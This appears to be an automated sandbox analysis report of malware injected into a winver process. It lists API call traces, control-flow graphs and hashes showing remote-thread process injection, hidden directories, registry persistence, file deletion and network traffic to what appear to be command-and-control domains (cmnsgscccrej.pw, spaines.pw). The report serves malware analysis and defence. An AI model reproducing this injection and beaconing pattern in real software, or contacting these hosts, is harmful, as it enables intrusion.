• Not Executed
                                                                                                                                                                          APIs
                                                                                                                                                                          • send.WS2_32(?,00000000,00000000,00000000), ref: 047E2FF4
                                                                                                                                                                          • send.WS2_32(?,047E2A30,047E2A2C,00000000), ref: 047E300D
                                                                                                                                                                          • recv.WS2_32(?,047E2A30,00A00000,00000000), ref: 047E3030
                                                                                                                                                                          • closesocket.WS2_32(?), ref: 047E304A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: send$closesocketrecv
                                                                                                                                                                          • String ID: cmnsgscccrej.pw
                                                                                                                                                                          • API String ID: 3431254638-1830621847
                                                                                                                                                                          • Opcode ID: 9574067959f33b04d739d713f0caaf9cbaae1037dcd8482bb700ab3644756bfa
                                                                                                                                                                          • Instruction ID: 2652135ea4646eb9e703827332966bc03e21803dad9d206427d9512aa0331cf4
                                                                                                                                                                          • Opcode Fuzzy Hash: 9574067959f33b04d739d713f0caaf9cbaae1037dcd8482bb700ab3644756bfa
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D218172B00114AFFB215E29CC44B6A7BF9EF48784F044694FE09EB255D735ED608BA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,047E0D88,00000000,0000090B,00000000), ref: 047E0E06
                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 047E0E24
                                                                                                                                                                          • CreateRemoteThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000), ref: 047E0E70
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocCreateMemoryProcessRemoteThreadVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1718980022-0
                                                                                                                                                                          • Opcode ID: ecdb29b40f7c4aeff1928634133c43dba02166f8c9ac01a718fa6e3a21a6a1c3
                                                                                                                                                                          • Instruction ID: dc2a2b36c6b2663c771f6f30e456d94cf7563f7014eb75abd40e6cd98ebfa9ce
                                                                                                                                                                          • Opcode Fuzzy Hash: ecdb29b40f7c4aeff1928634133c43dba02166f8c9ac01a718fa6e3a21a6a1c3
                                                                                                                                                                          • Instruction Fuzzy Hash: 6C116032100205BBFF105F25CC49FA63B69EF84754F188021FD04BE199D770B520CAA8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph
APIs
• LoadLibraryA.KERNELBASE(047E2925,00000008,?,00000000,047E2811,00000000), ref: 047E2932
  • Part of subcall function 047E0C9C: GetProcAddress.KERNEL32(047E2811,047E290A), ref: 047E0CA9
• WSAStartup.WS2_32(00000202,00000000), ref: 047E2957
• VirtualAlloc.KERNELBASE(00000000,01400000,00003000,00000004), ref: 047E296F
• lstrcat.KERNEL32(00000000,047E299D), ref: 047E29AC
• lstrcat.KERNEL32(00000000,047E29D4), ref: 047E29E3
• lstrcat.KERNEL32(00000000,047E2A0B), ref: 047E2A1A
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 047E2A94
  • Part of subcall function 047E2683: CreateFileA.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000), ref: 047E269E
  • Part of subcall function 047E2683: GetFileSize.KERNEL32(?,00000000), ref: 047E26B7
  • Part of subcall function 047E2683: ReadFile.KERNELBASE(047E298A,?,00000000,?,00000000), ref: 047E26DB
  • Part of subcall function 047E2683: CloseHandle.KERNEL32(047E298A), ref: 047E26EC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 047E2AD8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 047E2B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 047E2B42
Strings
Memory Dump Source
• Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
Similarity
• API ID: File$Deletelstrcat$AddressAllocCloseCreateHandleLibraryLoadProcReadSizeSleepStartupVirtual
• String ID: `nIu
• API String ID: 3655464437-1509933002
• Opcode ID: 123cee287050aa4130abb0b2e68c87aa3392ee7ebd80efcf2861b6cc2cd8a842
• Instruction ID: 2c74514583c7b2857184e1f26696675b98da5cc4563d67a20f7e7668131cb132
• Opcode Fuzzy Hash: 123cee287050aa4130abb0b2e68c87aa3392ee7ebd80efcf2861b6cc2cd8a842
• Instruction Fuzzy Hash: 35517971500214AEEB226F72CD48FBB77BCFF44709F0446D6AA45EA156DE30A680DEA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• CreateMutexA.KERNELBASE(00000000,00000000), ref: 047E065A
  • Part of subcall function 047E067C: LoadLibraryA.KERNELBASE(047E0673,00000009,?,00000000), ref: 047E0681
  • Part of subcall function 047E067C: lstrcmpiA.KERNEL32(?,00000000), ref: 047E06EB
  • Part of subcall function 047E067C: Sleep.KERNELBASE(00001388), ref: 047E06FE
  • Part of subcall function 047E067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E071F
  • Part of subcall function 047E067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0731
  • Part of subcall function 047E067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E0752
  • Part of subcall function 047E067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0764
  • Part of subcall function 047E067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E0785
  • Part of subcall function 047E067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0797
  • Part of subcall function 047E067C: VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 047E07AB
  • Part of subcall function 047E26F9: CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 047E2715
  • Part of subcall function 047E26F9: SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 047E2732
  • Part of subcall function 047E26F9: WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 047E274E
  • Part of subcall function 047E26F9: CloseHandle.KERNEL32(?), ref: 047E275F
  • Part of subcall function 047E0811: RegCreateKeyExA.KERNELBASE(00000000,047E0840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 047E0876
  • Part of subcall function 047E0811: RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 047E089D
  • Part of subcall function 047E0811: RegCloseKey.KERNELBASE(?), ref: 047E08A9
Memory Dump Source
• Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
Similarity
• API ID: CreateFile$AttributesDirectory$Close$AllocHandleLibraryLoadMutexPointerSleepValueVirtualWritelstrcmpi
• String ID:
• API String ID: 2311107590-0
• Opcode ID: 23fe9d41b4c0fd8f85a64b07ac5772dc61afcf4539fa5e17d3a9c2967f868177
• Instruction ID: 5906faff4f38ca5a26b67b9ecc4537c152cba588bf5dcacd58a1de376caeebec
• Opcode Fuzzy Hash: 23fe9d41b4c0fd8f85a64b07ac5772dc61afcf4539fa5e17d3a9c2967f868177
• Instruction Fuzzy Hash: 9E5133B2504214AFEF13AF61CC88FAA77BCEF44704F05059DAB85EF146DE706690CAA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• LoadLibraryA.KERNELBASE(047E0673,00000009,?,00000000), ref: 047E0681
  • Part of subcall function 047E0C9C: GetProcAddress.KERNEL32(047E2811,047E290A), ref: 047E0CA9
  • Part of subcall function 047E2597: lstrcat.KERNEL32(047E2634,00000000), ref: 047E25DE
  • Part of subcall function 047E06C2: lstrcmpiA.KERNEL32(?,00000000), ref: 047E06EB
  • Part of subcall function 047E06C2: Sleep.KERNELBASE(00001388), ref: 047E06FE
  • Part of subcall function 047E06C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E071F
  • Part of subcall function 047E06C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0731
  • Part of subcall function 047E06C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E0752
  • Part of subcall function 047E06C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0764
  • Part of subcall function 047E06C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E0785
  • Part of subcall function 047E06C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0797
  • Part of subcall function 047E06C2: VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 047E07AB
Memory Dump Source
• Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
Similarity
• API ID: AttributesCreateDirectoryFile$AddressAllocLibraryLoadProcSleepVirtuallstrcatlstrcmpi
• String ID:
• API String ID: 2102637170-0
• Opcode ID: 5de239d9be66570cd2289521d95d90d9cab5e80f55aeab0bdb7006df202fe909
• Instruction ID: 802e032195e6ae89279158427fa47a9a5f91af8330a60aad32d1135914c48eff
• Opcode Fuzzy Hash: 5de239d9be66570cd2289521d95d90d9cab5e80f55aeab0bdb7006df202fe909
• Instruction Fuzzy Hash: 814131B2500214AFEF13AF61C888BAA77BCEF44704F050599AB85EF155DE709690CEA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• lstrcmpiA.KERNEL32(?,00000000), ref: 047E06EB
• Sleep.KERNELBASE(00001388), ref: 047E06FE
• CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E071F
• SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0731
• CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E0752
• SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0764
  • Part of subcall function 047E2597: lstrcat.KERNEL32(047E2634,00000000), ref: 047E25DE
• CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E0785
• SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0797
• VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 047E07AB
Memory Dump Source
• Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
Similarity
• API ID: AttributesCreateDirectoryFile$AllocSleepVirtuallstrcatlstrcmpi
• String ID:
• API String ID: 2015199959-0
• Opcode ID: 1c226179281e77d9add93f1d77d7a7ba9467f2847751cd0325fb52aca6bbedbc
• Instruction ID: 4f78fbee393ea9578b0658a0b5bf30ad834a6bd034ea7b0654cf13b389015857
• Opcode Fuzzy Hash: 1c226179281e77d9add93f1d77d7a7ba9467f2847751cd0325fb52aca6bbedbc
• Instruction Fuzzy Hash: AF313DB25002249FEF16AF60C888FAA73ACEF44704F4505A9AB85EF145DE709690CEA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• lstrcat.KERNEL32(00000000,047E299D), ref: 047E29AC
  • Part of subcall function 047E29DD: lstrcat.KERNEL32(00000000,047E29D4), ref: 047E29E3
  • Part of subcall function 047E29DD: lstrcat.KERNEL32(00000000,047E2A0B), ref: 047E2A1A
  • Part of subcall function 047E29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 047E2A94
  • Part of subcall function 047E29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 047E2AD8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 047E2B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 047E2B42
Memory Dump Source
• Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
Similarity
• API ID: DeleteFilelstrcat$Sleep
• String ID:
• API String ID: 588723932-0
• Opcode ID: a59d9b3575d39faaedf29f35c9c8ec066547d1ec0f6634f348c18150469a5b98
• Instruction ID: 18c371fe449bc57e3ea706ba14971b91c3096c596a93059995c803553e8940e4
• Opcode Fuzzy Hash: a59d9b3575d39faaedf29f35c9c8ec066547d1ec0f6634f348c18150469a5b98
• Instruction Fuzzy Hash: 144127715002149EEB326B72CD4CFBB77BCFF48709F0446D6AA45EA152DE34A680DEA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 203 47e2f3f-47e2f7b call 47e3653 call 47e3673 lstrlen call 47e3673 call 47e2f88 212 47e2f7d-47e2f7e 203->212 213 47e2fe2-47e2feb 203->213 214 47e2fad-47e2fe1 call 47e363b 212->214 215 47e2f80-47e2f83 212->215 216 47e2fee-47e2ffc send 213->216 214->213 215->216 217 47e2f86 215->217 219 47e2ffe 216->219 220 47e3042-47e3054 closesocket 216->220 217->214 222 47e3001-47e3015 send 219->222 222->220 224 47e3017-47e301c 222->224 224->222 225 47e301e-47e3023 224->225 226 47e3026-47e3038 recv 225->226 226->220 227 47e303a-47e303e 226->227 227->226 228 47e3040 227->228 228->220
APIs
• lstrlen.KERNEL32(cmnsgscccrej.pw,00000000,047E2F2E,00000011,?,00000000,00000011,00000000,/EiDQjNbWEQ/,00000000), ref: 047E2F53
  • Part of subcall function 047E2F88: send.WS2_32(?,00000000,00000000,00000000), ref: 047E2FF4
  • Part of subcall function 047E2F88: send.WS2_32(?,047E2A30,047E2A2C,00000000), ref: 047E300D
  • Part of subcall function 047E2F88: recv.WS2_32(?,047E2A30,00A00000,00000000), ref: 047E3030
  • Part of subcall function 047E2F88: closesocket.WS2_32(?), ref: 047E304A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
Similarity
• API ID: send$closesocketlstrlenrecv
• String ID: cmnsgscccrej.pw
• API String ID: 1577144637-1830621847
• Opcode ID: 47e1b1d1e09dae78ecab814af72e97c8beb8c55764ffd7795c611f6a9b2faa7b
• Instruction ID: 61c16902e69c0e034b26ce2a946807ec460c464d972d5856849d8f6121b4ff3c
• Opcode Fuzzy Hash: 47e1b1d1e09dae78ecab814af72e97c8beb8c55764ffd7795c611f6a9b2faa7b
• Instruction Fuzzy Hash: 6D21B672600114BFEB225E25CC44FBA3BEDEF48744F084294FF08EB255D735AA208BA4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 229 47e0ce8-47e0cfd 230 47e0d03-47e0d10 CreateToolhelp32Snapshot 229->230 230->230 231 47e0d12-47e0d45 Sleep Process32First 230->231 232 47e0d47-47e0d53 231->232 233 47e0db5-47e0ddb FindCloseChangeNotification Sleep 231->233 234 47e0d54-47e0d63 232->234 233->230 235 47e0d8e-47e0da6 Process32Next 234->235 236 47e0d65-47e0d7a 234->236 235->233 237 47e0da8-47e0daa 235->237 236->235 240 47e0d7c-47e0d88 call 47e0de0 FindCloseChangeNotification 236->240 237->234 239 47e0dac-47e0db3 237->239 239->234 240->235
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047E0D07
• Sleep.KERNELBASE(000003E8), ref: 047E0D1D
• Process32First.KERNEL32(?,00000000), ref: 047E0D3D
• FindCloseChangeNotification.KERNELBASE(00000000,0000090B,00000000), ref: 047E0D88
• Process32Next.KERNEL32(?,?), ref: 047E0D9E
• FindCloseChangeNotification.KERNELBASE(?), ref: 047E0DCA
• Sleep.KERNELBASE(000003E8), ref: 047E0DD5
Memory Dump Source
• Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
Similarity
• API ID: ChangeCloseFindNotificationProcess32Sleep$CreateFirstNextSnapshotToolhelp32
• String ID:
• API String ID: 1902139912-0
• Opcode ID: afb6d3aa63b786e4d0f51ac43728f549072800bc8fd610c1c4fa07c95256845f
• Instruction ID: c34a993a8982a24e48b9b495d562f3cd8d6277b806ee467bc25e3d4ad71f5f1d
• Opcode Fuzzy Hash: afb6d3aa63b786e4d0f51ac43728f549072800bc8fd610c1c4fa07c95256845f
• Instruction Fuzzy Hash: 71217131901168ABEF229F15CC54BE9B7B9FF08740F0802D9E919EA295DB70AA90CF55
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 243 47e261c-47e262a call 47e3653 ExpandEnvironmentStringsA 246 47e262c 243->246 247 47e2636-47e2640 243->247 248 47e2634 246->248 249 47e262f call 47e2597 246->249 250 47e266c-47e2679 lstrcat 247->250 251 47e2642-47e265b call 47e265e 247->251 253 47e267f-47e2680 248->253 249->248 250->253 255 47e265d-47e2666 lstrcat 251->255 256 47e26b9-47e26c6 251->256 255->250 257 47e26c8-47e26e3 ReadFile 256->257 258 47e26e9-47e26f6 CloseHandle 256->258 257->258 259 47e26e5-47e26e6 257->259 259->258
APIs
• ExpandEnvironmentStringsA.KERNEL32(047E260C,00000010,?,?,047E298A,00000104), ref: 047E2621
• lstrcat.KERNEL32(047E298A,047E2659), ref: 047E2666
• lstrcat.KERNEL32(047E298A,047E298A), ref: 047E2679
  • Part of subcall function 047E2597: lstrcat.KERNEL32(047E2634,00000000), ref: 047E25DE
Strings
Memory Dump Source
• Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
Similarity
• API ID: lstrcat$EnvironmentExpandStrings
• String ID: \AC\
• API String ID: 2903145849-1749977576
• Opcode ID: 1a1455d68d8f3bd8c3de392b281e5d27977fe7010f103cb395b91df9d1250492
• Instruction ID: ecaeebc60139bfe5004e003f203253e158dd5b2c3d5232efd69586e8733d1ef2
• Opcode Fuzzy Hash: 1a1455d68d8f3bd8c3de392b281e5d27977fe7010f103cb395b91df9d1250492
• Instruction Fuzzy Hash: A1116A71500508EFEF02DFA1C849EADBBB8FF18344F1442E9E945EE222D7319A51DB94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 261 47e29dd-47e2a1a call 47e3653 lstrcat call 47e2501 call 47e2a14 call 47e3653 lstrcat 271 47e2a20-47e2a2b call 47e2b4d 261->271 273 47e2a30-47e2a43 call 47e34f7 271->273 275 47e2a48-47e2a4f 273->275 275->271 276 47e2a51-47e2a6d call 47e343f call 47e2683 275->276 281 47e2a6f 276->281 282 47e2a9a-47e2ab1 call 47e2683 276->282 281->282 283 47e2a71-47e2a86 call 47e26f9 281->283 288 47e2ade-47e2af5 call 47e2683 282->288 289 47e2ab3 282->289 283->282 291 47e2a88 283->291 296 47e2af8-47e2b11 call 47e2e97 288->296 297 47e2af7 288->297 289->288 292 47e2ab5-47e2aca call 47e26f9 289->292 291->282 294 47e2a8a-47e2a94 DeleteFileA 291->294 292->288 300 47e2acc 292->300 294->282 303 47e2b34-47e2b48 Sleep 296->303 304 47e2b13-47e2b1c call 47e3057 296->304 297->296 300->288 301 47e2ace-47e2ad8 DeleteFileA 300->301 301->288 303->275 304->303 307 47e2b1e-47e2b2e DeleteFileA 304->307 307->303
APIs
• lstrcat.KERNEL32(00000000,047E29D4), ref: 047E29E3
  • Part of subcall function 047E2A14: lstrcat.KERNEL32(00000000,047E2A0B), ref: 047E2A1A
  • Part of subcall function 047E2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 047E2A94
  • Part of subcall function 047E2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 047E2AD8
  • Part of subcall function 047E2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 047E2B2E
  • Part of subcall function 047E2A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 047E2B42
Memory Dump Source
• Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
Similarity
• API ID: DeleteFile$lstrcat$Sleep
• String ID:
• API String ID: 4261675396-0
• Opcode ID: f25f655f168d47ae09fd180d96ac9ab6615c369bbaafbdd74acb6aa40e99586a
• Instruction ID: dbb76a486875cc18f611aeac3547b53320ebceaf30b6b697990d25363b700e6b
• Opcode Fuzzy Hash: f25f655f168d47ae09fd180d96ac9ab6615c369bbaafbdd74acb6aa40e99586a
• Instruction Fuzzy Hash: 234148715002149EDF326F72CD48BBB76BCFF48709F0446D6AD45E6152DE34A580DEA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 329 47e2f38-47e2f3b 330 47e2f3d 329->330 331 47e2fb1-47e2ffc call 47e363b send 329->331 330->331 336 47e2ffe 331->336 337 47e3042-47e3054 closesocket 331->337 338 47e3001-47e3015 send 336->338 338->337 339 47e3017-47e301c 338->339 339->338 340 47e301e-47e3023 339->340 341 47e3026-47e3038 recv 340->341 341->337 342 47e303a-47e303e 341->342 342->341 343 47e3040 342->343 343->337
APIs
• send.WS2_32(?,00000000,00000000,00000000), ref: 047E2FF4
• send.WS2_32(?,047E2A30,047E2A2C,00000000), ref: 047E300D
• recv.WS2_32(?,047E2A30,00A00000,00000000), ref: 047E3030
• closesocket.WS2_32(?), ref: 047E304A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
Similarity
• API ID: send$closesocketrecv
• String ID: cmnsgscccrej.pw
• API String ID: 3431254638-1830621847
• Opcode ID: 3de71ac913557117b39ba19aefa8f7a10d2ba1ba6dbe92ee6fcdf69db35a4dda
• Instruction ID: c3c7316591e61417d0fd0c38551cda29e7db1df2ff484f539739444055fa76ce
• Opcode Fuzzy Hash: 3de71ac913557117b39ba19aefa8f7a10d2ba1ba6dbe92ee6fcdf69db35a4dda
• Instruction Fuzzy Hash: 96114F32700014ABEF225E29CC45BAA7BF9EF48784F0545D4FE08AB255D335A9508BA4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

                                                                                                                                                                          control_flow_graph 344 47e2a14-47e2a1a call 47e3653 lstrcat 347 47e2a20-47e2a2b call 47e2b4d 344->347 349 47e2a30-47e2a43 call 47e34f7 347->349 351 47e2a48-47e2a4f 349->351 351->347 352 47e2a51-47e2a6d call 47e343f call 47e2683 351->352 357 47e2a6f 352->357 358 47e2a9a-47e2ab1 call 47e2683 352->358 357->358 359 47e2a71-47e2a86 call 47e26f9 357->359 364 47e2ade-47e2af5 call 47e2683 358->364 365 47e2ab3 358->365 359->358 367 47e2a88 359->367 372 47e2af8-47e2b11 call 47e2e97 364->372 373 47e2af7 364->373 365->364 368 47e2ab5-47e2aca call 47e26f9 365->368 367->358 370 47e2a8a-47e2a94 DeleteFileA 367->370 368->364 376 47e2acc 368->376 370->358 379 47e2b34-47e2b48 Sleep 372->379 380 47e2b13-47e2b1c call 47e3057 372->380 373->372 376->364 377 47e2ace-47e2ad8 DeleteFileA 376->377 377->364 379->351 380->379 383 47e2b1e-47e2b2e DeleteFileA 380->383 383->379
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,047E2A0B), ref: 047E2A1A
                                                                                                                                                                            • Part of subcall function 047E2B4D: inet_addr.WS2_32(00000000), ref: 047E2BDA
                                                                                                                                                                            • Part of subcall function 047E2B4D: gethostbyname.WS2_32(00000000), ref: 047E2BEE
                                                                                                                                                                            • Part of subcall function 047E2B4D: Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 047E2C44
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 047E2A94
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 047E2AD8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 047E2B2E
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 047E2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$Sleep$gethostbynameinet_addrlstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1642945479-0
                                                                                                                                                                          • Opcode ID: e8b37fd542badaf8432c301c0c7f6f955668a479b2aefd2c0e39df4bfbe44a3d
                                                                                                                                                                          • Instruction ID: a5896c7737cb109b106cfb92e09a232f157fb16318f94fd3cac3b832f4b8511a
                                                                                                                                                                          • Opcode Fuzzy Hash: e8b37fd542badaf8432c301c0c7f6f955668a479b2aefd2c0e39df4bfbe44a3d
                                                                                                                                                                          • Instruction Fuzzy Hash: BD3135715002199EEB326F62CC48BBB76FCFF48709F0006E6AD45E6156EE34A590DEA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph (rendered image not reproduced): basic blocks 047E2B4D-047E2CF9. inet_addr at 047E2BD0 either continues to gethostbyname at 047E2BE4 or skips it; the Sleep block at 047E2C41 loops on itself before continuing to 047E2C51, and most later blocks branch back to 047E2B5E.
                                                                                                                                                                          APIs
                                                                                                                                                                          • inet_addr.WS2_32(00000000), ref: 047E2BDA
                                                                                                                                                                          • gethostbyname.WS2_32(00000000), ref: 047E2BEE
                                                                                                                                                                          • Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 047E2C44
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepgethostbynameinet_addr
                                                                                                                                                                          • String ID: spaines.pw
                                                                                                                                                                          • API String ID: 4125869991-3306378189
                                                                                                                                                                          • Opcode ID: c9cc6fa465a78be1f47e10917d204f6e8e853b0dcedaa1fd5f228baccd3b115a
                                                                                                                                                                          • Instruction ID: 5405291d9bb5658d871f50fbd2721210e095de5baf4868901e275c016c416159
                                                                                                                                                                          • Opcode Fuzzy Hash: c9cc6fa465a78be1f47e10917d204f6e8e853b0dcedaa1fd5f228baccd3b115a
                                                                                                                                                                          • Instruction Fuzzy Hash: CC411871500104AEEB12AF26C888BBA7BEDEF48704F0587D5EC45EF247EB30A545CBA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • inet_addr.WS2_32(00000000), ref: 047E2BDA
                                                                                                                                                                          • gethostbyname.WS2_32(00000000), ref: 047E2BEE
                                                                                                                                                                          • Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 047E2C44
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
